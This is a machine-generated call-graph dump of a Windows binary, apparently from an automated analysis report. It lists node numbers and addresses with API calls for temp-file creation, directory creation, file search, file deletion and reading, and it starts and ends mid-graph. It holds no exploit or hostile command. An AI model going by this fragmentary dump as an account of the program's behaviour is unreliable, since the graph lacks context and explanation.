AreFileApisANSI 14173->14176 14190 403d04 14176->14190 14177 405a30 CreateFileW 14178 405a53 14177->14178 14178->13915 14183 403a9c ctype 29 API calls 14184 405a17 14183->14184 14185 403a9c ctype 29 API calls 14184->14185 14186 405a1f 14185->14186 14186->14178 14188 405a6d FindCloseChangeNotification 14187->14188 14189 405a2c 14187->14189 14188->14189 14189->14177 14189->14178 14198 403c43 14190->14198 14193 40597a 14194 405a63 FindCloseChangeNotification 14193->14194 14195 405985 14194->14195 14196 405989 CreateFileA 14195->14196 14197 4059ae 14195->14197 14196->14197 14197->14183 14199 403c4d __EH_prolog 14198->14199 14200 40243e 30 API calls 14199->14200 14201 403c6f 14200->14201 14202 403cd3 14201->14202 14204 403c90 WideCharToMultiByte 14201->14204 14206 40243e 30 API calls 14201->14206 14212 403d24 14202->14212 14204->14202 14207 403cbe 14204->14207 14206->14204 14211 413d3d RaiseException 14207->14211 14208 403a9c ctype 29 API calls 14210 403cf0 14208->14210 14210->14193 14211->14202 14213 40243e 30 API calls 14212->14213 14214 403ce8 14213->14214 14214->14208 14216 405bb5 14215->14216 14219 405b7b ReadFile 14216->14219 14218 405bc6 14218->14157 14219->14218 14221 401eef 14220->14221 14222 4024a0 14220->14222 14221->13915 14223 40243e 30 API calls 14222->14223 14223->14221 14225 4051d2 __EH_prolog 14224->14225 14240 405268 14225->14240 14228 405243 14266 4051a4 14228->14266 14229 4051a4 SetFileAttributesA DeleteFileA 14231 4051e3 14229->14231 14231->14228 14231->14229 14234 4014d3 14231->14234 14235 403a9c ctype 29 API calls 14231->14235 14238 405268 30 API calls 14231->14238 14239 40522c GetLastError 14231->14239 14243 40511b 14231->14243 14257 4058cd 14231->14257 14265 40498d CreateDirectoryA 14231->14265 14232 40524b 14233 403a9c ctype 29 API calls 14232->14233 14233->14234 14234->13435 14234->13436 14235->14231 14238->14231 14239->14231 14239->14234 14241 40243e 30 API calls 14240->14241 14242 405281 14241->14242 14242->14231 14244 405125 __EH_prolog 14243->14244 14245 40243e 30 API calls 14244->14245 14246 405141 14245->14246 14271 40506f 14246->14271 14248 40514c 14256 405164 14248->14256 14276 4050e5 14248->14276 14249 403a9c ctype 29 API calls 14251 405191 14249->14251 14251->14231 14254 405170 14255 4050e5 33 API calls 14254->14255 14254->14256 14255->14256 14256->14249 14258 4058d7 __EH_prolog 14257->14258 14297 404d51 14258->14297 14263 403a9c ctype 29 API calls 14264 4058fd 14263->14264 14264->14231 14265->14231 14267 4051b0 14266->14267 14268 4051ac 14266->14268 14320 404bdc 14267->14320 14268->14232 14270 4051b8 14270->14232 14272 405083 GetTempPathA 14271->14272 14273 40507d 14271->14273 14275 405095 14272->14275 14274 40243e 30 API calls 14273->14274 14274->14272 14275->14248 14277 4051a4 2 API calls 14276->14277 14278 4050ee 14277->14278 14288 4050ab 14278->14288 14280 4050ff 14281 405111 14280->14281 14293 4052f9 14280->14293 14281->14256 14283 4047db 14281->14283 14284 4047e9 14283->14284 14285 4047ef GetWindowsDirectoryA 14283->14285 14286 40243e 30 API calls 14284->14286 14287 404802 14285->14287 14286->14285 14287->14254 14289 4050c0 14288->14289 14290 4050c8 GetTempFileNameA 14288->14290 14291 40243e 30 API calls 14289->14291 14292 4050dd 14290->14292 14291->14290 14292->14280 14294 405305 14293->14294 14296 405316 14293->14296 14295 40243e 30 API calls 14294->14295 14295->14296 14296->14281 14298 40243e 30 API calls 14297->14298 14299 404d68 14298->14299 14300 405806 14299->14300 14301 405810 __EH_prolog 14300->14301 14306 40553a 14301->14306 14307 40551a FindClose 14306->14307 14308 40554b 14307->14308 14309 405566 14308->14309 14310 40554f FindFirstFileA 14308->14310 14313 40551a 14309->14313 14310->14309 14311 40556a 14310->14311 14316 40557f 14311->14316 14314 405524 FindClose 14313->14314 14315 40552f 14313->14315 14314->14315 14315->14263 14317 4055bd 14316->14317 14318 4046ab 30 API calls 14317->14318 14319 4055da 14318->14319 14319->14309 14325 40489c SetFileAttributesA 14320->14325 14322 404be6 14323 404bea 14322->14323 14324 404bec DeleteFileA 14322->14324 14323->14270 14324->14270 14325->14322 14326->13928 14328 402170 30 API calls 14327->14328 14329 4081c8 14328->14329 14329->13934 14331 407f10 __EH_prolog 14330->14331 14332 401c80 30 API calls 14331->14332 14333 407f67 14331->14333 14334 407f4c 14332->14334 14335 401c80 30 API calls 14333->14335 14355 407f93 14333->14355 14373 408062 14334->14373 14339 407f78 14335->14339 14336 408018 14338 4042d6 ctype 34 API calls 14336->14338 14341 408027 14338->14341 14342 408062 35 API calls 14339->14342 14344 4042ad ctype 34 API calls 14341->14344 14345 407f87 14342->14345 14343 403a9c ctype 29 API calls 14343->14333 14347 408033 14344->14347 14348 403a9c ctype 29 API calls 14345->14348 14346 402ee1 30 API calls 14346->14355 14349 4042d6 ctype 34 API calls 14347->14349 14348->14355 14350 408045 14349->14350 14351 4042ad ctype 34 API calls 14350->14351 14352 408051 14351->14352 14352->13934 14353 401d7a 30 API calls 14353->14355 14355->14336 14355->14346 14355->14353 14356 403a9c 29 API calls ctype 14355->14356 14386 4081e7 14355->14386 14356->14355 14358 408252 __EH_prolog 14357->14358 14359 403a76 30 API calls 14358->14359 14360 40825d 14359->14360 14361 408274 14360->14361 14426 40828f 14360->14426 14363 4039df 30 API calls 14361->14363 14364 408280 14363->14364 14364->13934 14366 40209c __EH_prolog 14365->14366 14367 4042d6 ctype 34 API calls 14366->14367 14368 4020c0 14367->14368 14369 4042ad ctype 34 API calls 14368->14369 14370 4020cb 14369->14370 14371 403a9c ctype 29 API calls 14370->14371 14372 4020d3 14371->14372 14372->13934 14374 40806c __EH_prolog 14373->14374 14375 4042d6 ctype 34 API calls 14374->14375 14376 40807e 14375->14376 14377 402170 30 API calls 14376->14377 14378 408093 14377->14378 14379 4080ef 14378->14379 14381 4080de 14378->14381 14383 401db8 30 API calls 14378->14383 14396 403998 14378->14396 14380 403a9c ctype 29 API calls 14379->14380 14382 407f5b 14380->14382 14381->14379 14384 403998 30 API calls 14381->14384 14382->14343 14383->14378 14384->14379 14387 4081f1 __EH_prolog 14386->14387 14388 403a76 30 API calls 14387->14388 14389 4081fd 14388->14389 14390 408227 14389->14390 14391 401ce1 30 API calls 14389->14391 14393 4039df 30 API calls 14390->14393 14392 408217 14391->14392 14394 401ce1 30 API calls 14392->14394 14395 408238 14393->14395 14394->14390 14395->14355 14397 4039a2 __EH_prolog 14396->14397 14398 403a76 30 API calls 14397->14398 14399 4039ad 14398->14399 14400 4039c4 14399->14400 14401 401ce1 30 API calls 14399->14401 14404 4039df 14400->14404 14401->14400 14403 4039d0 14403->14378 14407 4042ff 14404->14407 14408 4039e7 14407->14408 14409 404307 14407->14409 14408->14403 14411 404327 14409->14411 14412 4043cb 14411->14412 14413 40433b 14411->14413 14412->14408 14414 404358 14413->14414 14423 413d3d RaiseException 14413->14423 14416 40437f 14414->14416 14424 413d3d RaiseException 14414->14424 14418 403a76 30 API calls 14416->14418 14422 4043a7 14416->14422 14420 40438b 14418->14420 14419 403a9c ctype 29 API calls 14419->14412 14420->14422 14425 413d3d RaiseException 14420->14425 14422->14419 14423->14414 14424->14416 14425->14422 14427 408299 __EH_prolog 14426->14427 14428 401ce1 30 API calls 14427->14428 14429 4082c0 14428->14429 14432 4082e8 14429->14432 14433 4082f2 __EH_prolog 14432->14433 14434 4042d6 ctype 34 API calls 14433->14434 14435 408319 14434->14435 14438 408334 14435->14438 14439 404327 30 API calls 14438->14439 14440 40834c 14439->14440 14441 4082d0 14440->14441 14442 4081e7 30 API calls 14440->14442 14441->14361 14442->14440 14444 403380 __EH_prolog 14443->14444 14445 402170 30 API calls 14444->14445 14446 40339c 14445->14446 14447 402170 30 API calls 14446->14447 14448 4033b1 14447->14448 14449 402170 30 API calls 14448->14449 14450 402f3e 14449->14450 14450->13947 14452 40311d __EH_prolog 14451->14452 14547 402ee1 14452->14547 14457 403141 14458 401d1b 30 API calls 14457->14458 14459 40314f 14458->14459 14461 403a9c ctype 29 API calls 14459->14461 14460 403158 14556 408f0a 14460->14556 14494 4031c1 14461->14494 14463 403198 14464 4042ad ctype 34 API calls 14463->14464 14465 4031a6 14464->14465 14466 4031c6 14465->14466 14467 4031ab 14465->14467 14468 401ce1 30 API calls 14466->14468 14469 401d1b 30 API calls 14467->14469 14470 4031d2 14468->14470 14469->14459 14471 405d0b 30 API calls 14470->14471 14472 4031de 14471->14472 14616 4049dd 14472->14616 14475 40322a 14477 401c80 30 API calls 14475->14477 14476 4031ea 14743 409569 14476->14743 14479 403237 14477->14479 14651 402685 14479->14651 14485 403a9c ctype 29 API calls 14487 403269 14485->14487 14658 40bbc9 14487->14658 14707 40c231 14487->14707 14491 403284 14494->13959 14500 403494 __EH_prolog 14499->14500 14501 403a9c ctype 29 API calls 14500->14501 14502 4034aa 14501->14502 16150 40341c 14502->16150 14505 403a9c ctype 29 API calls 14506 4034cc 14505->14506 14507 403a9c ctype 29 API calls 14506->14507 14508 401581 14507->14508 14508->13494 14508->13495 14510 4034ed __EH_prolog 14509->14510 14511 402170 30 API calls 14510->14511 14512 40351f 14511->14512 14513 402170 30 API calls 14512->14513 14514 403535 14513->14514 14515 402170 30 API calls 14514->14515 14516 40354b 14515->14516 14517 402170 30 API calls 14516->14517 14518 403564 14517->14518 16160 4035a6 14518->16160 14521 402170 30 API calls 14522 403589 14521->14522 14522->13954 16179 4148be 14523->16179 14526 413243 14526->13960 14527 413248 GetLastError 14528 413252 14527->14528 14528->13960 14530 4131e9 CloseHandle 14529->14530 14532 402fd0 14529->14532 14531 4131f4 GetLastError 14530->14531 14530->14532 14531->14532 14532->13968 14534 4030a7 __EH_prolog 14533->14534 14535 401d7a 30 API calls 14534->14535 14536 4030bc 14535->14536 16251 40620b 14536->16251 14540 4030d4 14541 40602f 33 API calls 14540->14541 14542 4030df 14541->14542 16271 406049 14542->16271 14545 403a9c ctype 29 API calls 14546 4030f5 ShowWindow 14545->14546 14546->13980 14548 402170 30 API calls 14547->14548 14549 402ef5 14548->14549 14550 405841 14549->14550 14551 40584b __EH_prolog 14550->14551 14751 4055de 14551->14751 14554 40551a FindClose 14555 40313d 14554->14555 14555->14457 14555->14460 14557 408f14 __EH_prolog 14556->14557 14558 403a76 30 API calls 14557->14558 14559 408f31 14558->14559 14560 408f43 14559->14560 14873 409184 14559->14873 14562 402170 30 API calls 14560->14562 14563 408f7a 14562->14563 14564 402170 30 API calls 14563->14564 14565 408f91 14564->14565 14566 402170 30 API calls 14565->14566 14567 408fa8 14566->14567 14568 40906f 14567->14568 14792 404e76 14567->14792 14847 408a3b 14568->14847 14573 408fd3 GetLastError 14577 403a9c ctype 29 API calls 14573->14577 14574 40900e 14578 401e3a 30 API calls 14574->14578 14575 4090a1 14580 403a9c ctype 29 API calls 14575->14580 14576 4090d5 14582 402634 30 API calls 14576->14582 14581 408fe3 14577->14581 14579 40901d 14578->14579 14583 401d7a 30 API calls 14579->14583 14584 4090a9 14580->14584 14585 403a9c ctype 29 API calls 14581->14585 14586 4090e4 14582->14586 14587 40902a 14583->14587 14588 403a9c ctype 29 API calls 14584->14588 14589 408feb 14585->14589 14590 403998 30 API calls 14586->14590 14592 403a9c ctype 29 API calls 14587->14592 14593 4090b1 14588->14593 14594 403a9c ctype 29 API calls 14589->14594 14591 4090f3 14590->14591 14595 403a9c ctype 29 API calls 14591->14595 14596 409036 14592->14596 14597 403a9c ctype 29 API calls 14593->14597 14599 408ff3 14594->14599 14605 4090ff 14595->14605 14598 401e19 30 API calls 14596->14598 14597->14599 14601 409046 14598->14601 14599->14463 14600 409135 14604 403a9c ctype 29 API calls 14600->14604 14603 401d7a 30 API calls 14601->14603 14602 402634 30 API calls 14602->14605 14606 409053 14603->14606 14607 409152 14604->14607 14605->14600 14605->14602 14608 403998 30 API calls 14605->14608 14613 403a9c ctype 29 API calls 14605->14613 14609 403a9c ctype 29 API calls 14606->14609 14610 403a9c ctype 29 API calls 14607->14610 14608->14605 14611 40905f 14609->14611 14612 40915a 14610->14612 14833 4092e9 14611->14833 14615 403a9c ctype 29 API calls 14612->14615 14613->14605 14615->14599 14617 4049e7 __EH_prolog 14616->14617 14618 401c80 30 API calls 14617->14618 14623 4049f6 14618->14623 14619 401ce1 30 API calls 14621 404a56 14619->14621 14622 404a6d GetLastError 14621->14622 14629 404bb2 14621->14629 14641 401e3a 30 API calls 14621->14641 14642 404b41 14621->14642 14646 401d7a 30 API calls 14621->14646 14650 403a9c ctype 29 API calls 14621->14650 15450 40499c 14621->15450 14622->14621 14624 404aea 14622->14624 14623->14619 14633 404a38 14623->14633 14626 402ee1 30 API calls 14624->14626 14625 401d7a 30 API calls 14647 404b4e 14625->14647 14628 404af2 14626->14628 14627 403a9c ctype 29 API calls 14631 4031e6 14627->14631 14632 405841 37 API calls 14628->14632 14630 403a9c ctype 29 API calls 14629->14630 14630->14633 14631->14475 14631->14476 14634 404b01 14632->14634 14633->14627 14635 404b05 14634->14635 14636 404b35 14634->14636 14637 403a9c ctype 29 API calls 14635->14637 14639 403a9c ctype 29 API calls 14636->14639 14640 404b1d 14637->14640 14638 401e3a 30 API calls 14638->14647 14639->14642 14643 403a9c ctype 29 API calls 14640->14643 14641->14621 14642->14625 14645 404b25 14643->14645 14644 40499c 34 API calls 14644->14647 14648 403a9c ctype 29 API calls 14645->14648 14646->14621 14647->14629 14647->14638 14647->14644 14649 403a9c ctype 29 API calls 14647->14649 14648->14631 14649->14647 14650->14621 14652 401d7a 30 API calls 14651->14652 14653 4026ac 14652->14653 14654 401d7a 30 API calls 14653->14654 14655 4026d8 14654->14655 14656 405d0b 30 API calls 14655->14656 14657 4026df 14656->14657 14657->14485 14671 40bbd3 __EH_prolog 14658->14671 14659 40bd4e 14660 40bd90 14659->14660 14661 40bd63 14659->14661 14666 40c46d 35 API calls 14666->14671 14668 4042ad 34 API calls ctype 14668->14671 14671->14659 14671->14666 14671->14668 14684 40bc23 14671->14684 15580 40c30e 14671->15580 15586 40c281 14671->15586 15590 40c413 14671->15590 14684->14491 14708 40bdf7 14707->14708 14709 40be1c 14708->14709 14710 40be78 14708->14710 14712 403a76 30 API calls 14708->14712 14718 40c5e8 30 API calls 14708->14718 14721 40be5b 14708->14721 14722 40c73a 64 API calls 14708->14722 14723 40bf45 14708->14723 14726 40ad19 83 API calls 14708->14726 14730 40ca4c 64 API calls 14708->14730 14731 40c0f3 14708->14731 14732 40c059 14708->14732 14733 40c0b5 14708->14733 14736 40c156 14708->14736 14711 40c380 34 API calls 14709->14711 14714 40c380 34 API calls 14710->14714 14712->14708 14718->14708 14721->14491 14722->14708 14724 40c380 34 API calls 14723->14724 14726->14708 14730->14708 14734 40c380 34 API calls 14731->14734 14737 40c380 34 API calls 14732->14737 14738 40c380 34 API calls 14733->14738 14741 40c380 34 API calls 14736->14741 14744 409573 __EH_prolog 14743->14744 14745 40602f 33 API calls 14744->14745 14746 409585 14745->14746 16136 4094f6 14746->16136 14752 4055e8 __EH_prolog 14751->14752 14753 40551a FindClose 14752->14753 14754 4055f6 14753->14754 14755 405607 FindFirstFileW 14754->14755 14756 40562e 14754->14756 14761 40562c 14754->14761 14757 40561e 14755->14757 14755->14761 14758 401c80 30 API calls 14756->14758 14769 4056a6 14757->14769 14760 405639 AreFileApisANSI 14758->14760 14762 403d04 31 API calls 14760->14762 14761->14554 14763 405654 FindFirstFileA 14762->14763 14764 403a9c ctype 29 API calls 14763->14764 14765 40566e 14764->14765 14766 403a9c ctype 29 API calls 14765->14766 14767 40567a 14766->14767 14767->14761 14773 405705 14767->14773 14770 4056e4 14769->14770 14771 401d1b 30 API calls 14770->14771 14772 405701 14771->14772 14772->14761 14774 40570f __EH_prolog 14773->14774 14785 4052b2 14774->14785 14779 401d7a 30 API calls 14780 405794 14779->14780 14781 403a9c ctype 29 API calls 14780->14781 14782 40579c 14781->14782 14783 403a9c ctype 29 API calls 14782->14783 14784 4057a4 14783->14784 14784->14761 14786 4052c9 14785->14786 14787 40243e 30 API calls 14786->14787 14788 4052d8 AreFileApisANSI 14787->14788 14789 4057b5 14788->14789 14790 403b9c 31 API calls 14789->14790 14791 405787 14790->14791 14791->14779 14793 404e80 __EH_prolog 14792->14793 14794 404ea2 14793->14794 14795 404f2d 14793->14795 14797 404eb7 GetFullPathNameW 14794->14797 14799 402170 30 API calls 14794->14799 14796 40243e 30 API calls 14795->14796 14798 404f40 14796->14798 14802 404ed8 14797->14802 14881 4048ff 14798->14881 14799->14797 14802->14573 14802->14574 14805 403a9c ctype 29 API calls 14806 404f76 14805->14806 14807 404f8b 14806->14807 14808 404f7b 14806->14808 14896 405352 14807->14896 14809 403a9c ctype 29 API calls 14808->14809 14809->14802 14814 403a9c ctype 29 API calls 14815 404fb3 14814->14815 14902 405331 14815->14902 14818 404818 32 API calls 14819 404fd0 14818->14819 14820 403a9c ctype 29 API calls 14819->14820 14821 404fdc 14820->14821 14822 402634 30 API calls 14821->14822 14823 404ff1 14822->14823 14824 401d7a 30 API calls 14823->14824 14825 404ffd 14824->14825 14834 4092f3 __EH_prolog 14833->14834 14835 401d7a 30 API calls 14834->14835 14836 409308 14835->14836 14837 402634 30 API calls 14836->14837 14838 409315 14837->14838 14839 405841 37 API calls 14838->14839 14840 409324 14839->14840 14841 403a9c ctype 29 API calls 14840->14841 14842 409338 14841->14842 14843 409352 14842->14843 14918 413d3d RaiseException 14842->14918 14845 4042d6 ctype 34 API calls 14843->14845 14846 40935a 14845->14846 14846->14568 14861 408a45 __EH_prolog 14847->14861 14848 408ea0 30 API calls 14848->14861 14849 408cfb 14852 405e34 VariantClear 14849->14852 14850 401d7a 30 API calls 14850->14861 14851 408e75 14854 405e34 VariantClear 14851->14854 14860 408a61 14852->14860 14854->14860 14855 408ce8 15030 4038c2 14855->15030 14857 4093f0 30 API calls 14857->14861 14859 4038c2 29 API calls 14859->14861 14860->14575 14860->14576 14861->14848 14861->14849 14861->14850 14861->14851 14861->14855 14861->14857 14861->14859 14861->14860 14863 408d0e 14861->14863 14866 408d55 14861->14866 14867 408dae 14861->14867 14871 408e06 14861->14871 14919 408902 14861->14919 14932 405e34 14861->14932 14936 40836d 14861->14936 14961 408524 14861->14961 15026 40848c 14861->15026 14864 4038c2 29 API calls 14863->14864 14864->14860 14869 4038c2 29 API calls 14866->14869 14870 4038c2 29 API calls 14867->14870 14869->14860 14870->14860 14872 4038c2 29 API calls 14871->14872 14872->14860 14874 40918e __EH_prolog 14873->14874 14875 402170 30 API calls 14874->14875 14876 4091c1 14875->14876 15447 40590e 14876->15447 14879 402170 30 API calls 14880 4091e2 14879->14880 14880->14560 14882 404909 __EH_prolog 14881->14882 14883 401c80 30 API calls 14882->14883 14884 40491c AreFileApisANSI 14883->14884 14885 403d04 31 API calls 14884->14885 14886 404936 14885->14886 14887 403a9c ctype 29 API calls 14886->14887 14888 40493e 14887->14888 14889 404df9 14888->14889 14890 404e26 GetFullPathNameA 14889->14890 14891 404e1e 14889->14891 14893 404e45 14890->14893 14892 40243e 30 API calls 14891->14892 14892->14890 14894 404e50 14893->14894 14895 404e5b lstrlenA 14893->14895 14894->14805 14895->14894 14905 40536e 14896->14905 14899 404818 AreFileApisANSI 14900 403b9c 31 API calls 14899->14900 14901 404839 14900->14901 14901->14814 14903 40536e 30 API calls 14902->14903 14904 404fc2 14903->14904 14904->14818 14907 405378 __EH_prolog 14905->14907 14906 4053ac 14909 40243e 30 API calls 14906->14909 14907->14906 14908 4053a1 14907->14908 14910 403d24 30 API calls 14908->14910 14911 4053bf 14909->14911 14912 404f99 14910->14912 14913 40243e 30 API calls 14911->14913 14912->14899 14914 4053cc 14913->14914 14915 403d24 30 API calls 14914->14915 14916 4053fa 14915->14916 14917 403a9c ctype 29 API calls 14916->14917 14917->14912 14918->14843 14920 40890c __EH_prolog 14919->14920 14921 408927 14920->14921 14922 40894b 14920->14922 14923 403a76 30 API calls 14921->14923 14925 403a76 30 API calls 14922->14925 14927 40892e 14922->14927 14923->14927 14924 408524 88 API calls 14926 4089b8 14924->14926 14928 408957 14925->14928 14926->14861 14927->14924 15037 406434 14928->15037 14931 408994 GetLastError 14931->14926 14935 405e39 14932->14935 14933 405e5a VariantClear 14933->14861 14934 405e71 14934->14861 14935->14933 14935->14934 14937 408377 __EH_prolog 14936->14937 14938 4083a3 14937->14938 14939 4083b6 14937->14939 14940 405e34 VariantClear 14938->14940 14941 4083cc 14939->14941 14942 4083bd 14939->14942 14945 4083af 14940->14945 14943 4083ca 14941->14943 14944 40846a 14941->14944 14946 401d1b 30 API calls 14942->14946 14948 405e34 VariantClear 14943->14948 14947 405e34 VariantClear 14944->14947 14945->14861 14946->14943 14947->14945 14949 4083ed 14948->14949 14949->14945 14950 401d7a 30 API calls 14949->14950 14951 4083fd 14950->14951 14952 408421 14951->14952 14953 40842c 14951->14953 14954 40844f 14951->14954 14956 405e34 VariantClear 14952->14956 14957 401db8 30 API calls 14953->14957 14954->14952 14955 40843f 14954->14955 14958 405e34 VariantClear 14955->14958 14956->14945 14959 408435 14957->14959 14958->14945 15040 407d25 14959->15040 14963 40852e __EH_prolog 14961->14963 15048 40455d 14963->15048 14965 402170 30 API calls 14967 408570 14965->14967 14966 4085c4 14968 4085df 14966->14968 14980 4085ef 14966->14980 14967->14966 14972 401e19 30 API calls 14967->14972 14969 4039df 30 API calls 14968->14969 14988 4085ea 14969->14988 14970 40863c 14970->14988 15016 408648 14970->15016 15095 4042eb 14970->15095 14973 4085ab 14972->14973 14974 401d7a 30 API calls 14973->14974 14977 4085b8 14974->14977 14981 403a9c ctype 29 API calls 14977->14981 14978 4039df 30 API calls 14978->14980 14979 4042ad ctype 34 API calls 14982 408742 14979->14982 14980->14970 14980->14978 15088 4088ce 14980->15088 15092 404407 14980->15092 14981->14966 14983 403a9c ctype 29 API calls 14982->14983 14984 40874a 14983->14984 14985 403a9c ctype 29 API calls 14984->14985 14986 408752 14985->14986 14986->14861 14987 40876b 14989 4042ad ctype 34 API calls 14987->14989 14988->14987 14992 4087a1 14988->14992 14988->15016 15052 4065b2 14988->15052 15058 40fd0f 14988->15058 15062 40df69 14988->15062 15068 40d1ab 14988->15068 14990 408788 14989->14990 14991 403a9c ctype 29 API calls 14990->14991 14994 408790 14991->14994 14993 4087f8 14992->14993 14997 401d1b 30 API calls 14992->14997 14992->15016 14995 405e34 VariantClear 14993->14995 14996 403a9c ctype 29 API calls 14994->14996 14998 408804 14995->14998 14996->14986 14997->14993 14999 408879 14998->14999 15000 40881d 14998->15000 15001 4088ce 5 API calls 14999->15001 15002 401c80 30 API calls 15000->15002 15003 408884 15001->15003 15004 40882b 15002->15004 15006 407d82 35 API calls 15003->15006 15005 401c80 30 API calls 15004->15005 15007 408838 15005->15007 15008 4088a0 15006->15008 15098 407d82 15007->15098 15010 401d7a 30 API calls 15008->15010 15012 4088ad 15010->15012 15014 403a9c ctype 29 API calls 15012->15014 15013 401d7a 30 API calls 15015 40885c 15013->15015 15014->15016 15017 403a9c ctype 29 API calls 15015->15017 15016->14979 15027 408496 __EH_prolog 15026->15027 15028 405e34 VariantClear 15027->15028 15029 408511 15028->15029 15029->14861 15031 403a9c ctype 29 API calls 15030->15031 15032 4038cd 15031->15032 15033 403a9c ctype 29 API calls 15032->15033 15034 4038d5 15033->15034 15035 403a9c ctype 29 API calls 15034->15035 15036 4038dd 15035->15036 15036->14860 15038 405b6d 35 API calls 15037->15038 15039 406440 15038->15039 15039->14927 15039->14931 15041 407d3a 15040->15041 15041->15041 15044 4021c4 15041->15044 15045 402208 15044->15045 15046 4021d8 15044->15046 15045->14955 15047 402170 30 API calls 15046->15047 15047->15045 15050 40456d 15048->15050 15049 401e19 30 API calls 15051 404592 15049->15051 15050->15049 15051->14965 15053 4065c2 15052->15053 15054 4065bb 15052->15054 15108 405ace SetFilePointer 15053->15108 15054->14988 15059 40fd19 __EH_prolog 15058->15059 15060 403a76 30 API calls 15059->15060 15061 40fd24 15060->15061 15061->14988 15063 40df7a 15062->15063 15067 4065b2 3 API calls 15063->15067 15064 40df8e 15065 40df9e 15064->15065 15115 40dd8b 15064->15115 15065->14988 15067->15064 15069 40d1b5 __EH_prolog 15068->15069 15070 40df69 34 API calls 15069->15070 15071 40d208 15070->15071 15072 40d20e 15071->15072 15073 40d22f 15071->15073 15149 40d2cf 15072->15149 15145 40f8c3 15073->15145 15077 40d261 15155 40f4d8 15077->15155 15078 40d242 15079 40d2cf 34 API calls 15078->15079 15087 40d21a 15079->15087 15087->14988 15089 4088d9 15088->15089 15091 4088f6 15088->15091 15090 403b4f ctype 5 API calls 15089->15090 15089->15091 15090->15089 15091->14980 15093 4042ff 30 API calls 15092->15093 15094 40440f 15093->15094 15094->14980 15378 40ba4f 15095->15378 15096 4042fc 15096->14988 15099 407d8c __EH_prolog 15098->15099 15412 407dd5 15099->15412 15102 40235e 30 API calls 15103 407db0 15102->15103 15104 401ce1 30 API calls 15103->15104 15105 407dbb 15104->15105 15106 403a9c ctype 29 API calls 15105->15106 15107 407dc3 15106->15107 15107->15013 15109 405b01 15108->15109 15110 405af7 GetLastError 15108->15110 15111 406534 15109->15111 15110->15109 15112 406538 15111->15112 15113 40653b GetLastError 15111->15113 15112->15054 15114 406545 15113->15114 15114->15054 15116 40dd95 __EH_prolog 15115->15116 15127 40776f 15116->15127 15118 40ddc1 15118->15065 15119 40ddae 15119->15118 15130 4076d5 15119->15130 15121 40decb 15122 403a9c ctype 29 API calls 15121->15122 15122->15118 15123 40dde7 ctype 15123->15121 15124 40ded0 15123->15124 15136 406505 15123->15136 15125 4065b2 3 API calls 15124->15125 15125->15121 15141 407723 15127->15141 15131 4076e2 15130->15131 15132 407716 15130->15132 15133 4076ed ctype 15131->15133 15134 403a76 30 API calls 15131->15134 15132->15123 15135 403a9c ctype 29 API calls 15133->15135 15134->15133 15135->15132 15137 405ba8 ReadFile 15136->15137 15138 40651d 15137->15138 15139 406534 GetLastError 15138->15139 15140 406530 15139->15140 15140->15123 15142 407737 15141->15142 15143 407766 15142->15143 15144 406505 ReadFile GetLastError 15142->15144 15143->15119 15144->15142 15146 40f8cd __EH_prolog 15145->15146 15181 40f648 15146->15181 15150 40d2d9 __EH_prolog 15149->15150 15151 4042d6 ctype 34 API calls 15150->15151 15152 40d2fd 15151->15152 15153 4042ad ctype 34 API calls 15152->15153 15154 40d308 15153->15154 15154->15087 15182 40f652 __EH_prolog 15181->15182 15221 40d377 15182->15221 15186 40f694 15187 40db47 RaiseException 15186->15187 15188 40f6c9 15186->15188 15187->15188 15195 40d23b 15188->15195 15220 4065b2 3 API calls 15188->15220 15189 40f720 15190 4076d5 30 API calls 15189->15190 15189->15195 15195->15077 15195->15078 15220->15189 15222 40d3d2 34 API calls 15221->15222 15223 40d37f 15222->15223 15224 4042d6 ctype 34 API calls 15223->15224 15225 40d38a 15224->15225 15226 4042d6 ctype 34 API calls 15225->15226 15227 40d395 15226->15227 15228 4042d6 ctype 34 API calls 15227->15228 15229 40d3a0 15228->15229 15230 4042d6 ctype 34 API calls 15229->15230 15231 40d3ab 15230->15231 15232 4042d6 ctype 34 API calls 15231->15232 15233 40d3b6 15232->15233 15233->15186 15285 40db47 15233->15285 15286 413d3d RaiseException 15285->15286 15287 40db5f 15286->15287 15288 40db6f 15287->15288 15289 40db47 RaiseException 15287->15289 15288->15186 15289->15288 15380 40ba66 15378->15380 15379 40ba9e 15379->15096 15380->15379 15382 403a9c ctype 29 API calls 15380->15382 15383 40a011 15380->15383 15382->15380 15384 40a01b __EH_prolog 15383->15384 15385 4042ad ctype 34 API calls 15384->15385 15386 40a036 15385->15386 15387 4042ad ctype 34 API calls 15386->15387 15388 40a045 15387->15388 15389 4042d6 ctype 34 API calls 15388->15389 15390 40a05f 15389->15390 15391 4042ad ctype 34 API calls 15390->15391 15392 40a06a 15391->15392 15393 4042d6 ctype 34 API calls 15392->15393 15394 40a081 15393->15394 15395 4042ad ctype 34 API calls 15394->15395 15396 40a08c 15395->15396 15401 407868 15396->15401 15402 407880 15401->15402 15403 407887 15401->15403 15404 413260 SetEvent GetLastError 15402->15404 15405 407891 15403->15405 15406 407896 15403->15406 15404->15403 15407 413210 WaitForSingleObject 15405->15407 15408 4131e0 ctype CloseHandle GetLastError 15406->15408 15407->15406 15409 40789d 15408->15409 15410 4131e0 ctype CloseHandle GetLastError 15409->15410 15411 4078a5 15410->15411 15413 407ddf __EH_prolog 15412->15413 15415 401e19 30 API calls 15413->15415 15419 407e63 15413->15419 15414 407eb5 15416 407ebe 15414->15416 15417 407ecf 15414->15417 15421 407e1b 15415->15421 15437 407cd4 15416->15437 15420 402634 30 API calls 15417->15420 15419->15414 15423 407e8e 15419->15423 15436 407da4 15420->15436 15422 403b4f ctype 5 API calls 15421->15422 15424 407e28 15422->15424 15425 401e3a 30 API calls 15423->15425 15426 403a9c ctype 29 API calls 15424->15426 15427 407e9a 15425->15427 15428 407e39 15426->15428 15429 402634 30 API calls 15427->15429 15428->15419 15430 407e3e 15428->15430 15431 407e5e 15429->15431 15432 401e3a 30 API calls 15430->15432 15434 403a9c ctype 29 API calls 15431->15434 15433 407e4a 15432->15433 15435 402634 30 API calls 15433->15435 15434->15436 15435->15431 15436->15102 15438 407cde __EH_prolog 15437->15438 15439 401ce1 30 API calls 15438->15439 15440 407cf1 15439->15440 15441 407d25 30 API calls 15440->15441 15442 407d00 15441->15442 15443 401ce1 30 API calls 15442->15443 15444 407d0b 15443->15444 15445 403a9c ctype 29 API calls 15444->15445 15446 407d13 15445->15446 15446->15436 15448 402170 30 API calls 15447->15448 15449 405925 15448->15449 15449->14879 15451 4049ab 15450->15451 15452 4049cd CreateDirectoryW 15450->15452 15453 4048ff 32 API calls 15451->15453 15452->14621 15454 4049b6 15453->15454 15459 40498d 